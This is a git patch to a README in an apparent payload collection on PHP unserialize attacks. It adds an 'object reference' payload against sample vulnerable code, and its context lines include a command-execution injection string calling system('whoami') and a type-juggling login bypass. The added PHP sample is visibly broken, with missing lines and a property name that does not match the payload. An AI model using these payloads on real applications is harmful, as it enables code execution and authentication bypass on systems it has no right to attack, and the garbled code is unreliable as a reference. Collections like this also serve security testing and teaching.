From 3cf806c8ff05a7eab547aa3eb7c1c5b12ceea6dd Mon Sep 17 00:00:00 2001 From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Wed, 26 Sep 2018 00:13:19 +0200 Subject: [PATCH] 2nd unserialize payload --- PHP serialization/README.md | 37 +++++++++++++++++++++++++++++++++++++ 1 file changed, 37 insertions(+) diff --git a/PHP serialization/README.md b/PHP serialization/README.md index a0c1257..765d7b9 100644 --- a/PHP serialization/README.md +++ b/PHP serialization/README.md @@ -45,6 +45,8 @@ string(68) "O:18:"PHPObjectInjection":1:{s:6:"inject";s:17:"system('whoami');";} ## Authentication bypass +### Type juggling + Vulnerable code: ```php @@ -66,6 +68,40 @@ a:2:{s:8:"username";b:1;s:8:"password";b:1;} Because `true == "str"` is true. Ref: [POC2009 Shocking News in PHP Exploitation](https://www.owasp.org/images/f/f6/POC2009-ShockingNewsInPHPExploitation.pdf) +### Object reference + +Vulnerable code: + +```php +secretCode = rand(500000,999999); + if($obj->guess === $obj->secretCode) { + echo "Win"; + } +} +?> +``` + +Payload: + +``` +O:6:"Object":2:{s:10:"secretCode";N;s:4:"code";R:2;} +``` + +Ref: + +- [PHP Internals Book - Serialization](http://www.phpinternalsbook.com/classes_objects/serialization.html) +- [TSULOTT Web challenge write-up from MeePwn CTF 1st 2017 by Rawsec](https://rawsec.ml/en/MeePwn-2017-write-ups/#tsulott-web) + ## Others exploits Reverse Shell @@ -98,3 +134,4 @@ echo urlencode(serialize(new PHPObjectInjection)); * [PHP Object Injection - OWASP](https://www.owasp.org/index.php/PHP_Object_Injection) * [PHP Object Injection - Thin Ba Shane](http://location-href.com/php-object-injection/) +* [PHP unserialize](http://php.net/manual/en/function.unserialize.php)